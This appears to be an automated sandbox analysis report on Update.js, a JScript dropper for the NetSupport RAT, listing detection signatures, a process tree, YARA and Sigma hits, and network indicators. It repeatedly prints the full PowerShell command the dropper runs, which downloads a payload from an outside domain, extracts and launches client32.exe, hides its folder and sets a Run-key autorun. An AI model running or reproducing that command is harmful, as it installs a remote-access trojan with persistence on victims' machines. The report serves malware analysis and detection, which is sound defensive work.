
Windows Analysis Report
Update.js

Overview

General Information

Sample name:Update.js
Analysis ID:1508730
MD5:44b73d7c14986000a0865aefb01bf02b
SHA1:0f41ec94c405aa3e46b090a3ecda574cb01f17b3
SHA256:82a6ea1721bb31929e77725f9bb6e4dc38719ce8d61a5633285aed7cd5260b40
Tags:5-181-159-137jsnetsupport
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2324 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 2760 cmdline: "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 2872 cmdline: "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • svchost.exe (PID: 4196 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • client32.exe (PID: 1096 cmdline: "C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x34769a:$b1: ::WriteAllBytes(
  • 0x34751e:$b2: ::FromBase64String(
  • 0x63eec:$s3: Reverse
  • 0x63fba:$s3: Reverse
  • 0x64244:$s3: reverse
  • 0x6429a:$s3: Reverse
  • 0x642ed:$s3: Reverse
  • 0x645c2:$s3: reverse
  • 0x64618:$s3: Reverse
  • 0x64634:$s3: reverse
  • 0x64a8e:$s3: Reverse
  • 0x64af7:$s3: Reverse
  • 0x64dbb:$s3: Reverse
  • 0x64e27:$s3: Reverse
  • 0x64ea7:$s3: Reverse
  • 0x64f20:$s3: Reverse
  • 0x64f80:$s3: Reverse
  • 0x64fc4:$s3: reverse
  • 0x6511c:$s3: Reverse
  • 0x651cb:$s3: Reverse
  • 0x65241:$s3: Reverse
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
Source | Rule | Description | Author | Strings
0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000000D.00000002.2436230246.00000000003A2000.00000002.00000001.01000000.00000006.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000D.00000002.2437544828.0000000011194000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
00000012.00000002.2518264391.00000000111E2000.00000004.00000001.01000000.00000007.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
Source | Rule | Description | Author | Strings
18.2.client32.exe.6fb60000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
13.2.client32.exe.73f40000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
13.2.client32.exe.6fb60000.4.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
11.2.client32.exe.6fb60000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
18.2.client32.exe.73f40000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security
Source | Rule | Description | Author | Strings
amsi64_2324.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                                • 0x31bef3:$b1: ::WriteAllBytes(
                                • 0x31bdbd:$b2: ::FromBase64String(
                                • 0x612bf:$s3: Reverse
                                • 0x6134a:$s3: Reverse
                                • 0x615dc:$s3: reverse
                                • 0x61632:$s3: Reverse
                                • 0x61685:$s3: Reverse
                                • 0x6191e:$s3: reverse
                                • 0x61974:$s3: Reverse
                                • 0x61990:$s3: reverse
                                • 0x61e02:$s3: Reverse
                                • 0x61e6c:$s3: Reverse
                                • 0x620f9:$s3: Reverse
                                • 0x62166:$s3: Reverse
                                • 0x621e8:$s3: Reverse
                                • 0x62262:$s3: Reverse
                                • 0x622c3:$s3: Reverse
                                • 0x62309:$s3: reverse
                                • 0x62468:$s3: Reverse
                                • 0x624d1:$s3: Reverse
                                • 0x62548:$s3: Reverse

                                System Summary

                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 
'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 
'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 8.39.147.104, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 2324, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49718
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' 
+ $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ProcessId: 2324, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5880, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CJYJHX
                                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5880, TargetFilename: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exe
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; 
exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minim
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 
'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 2324, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object 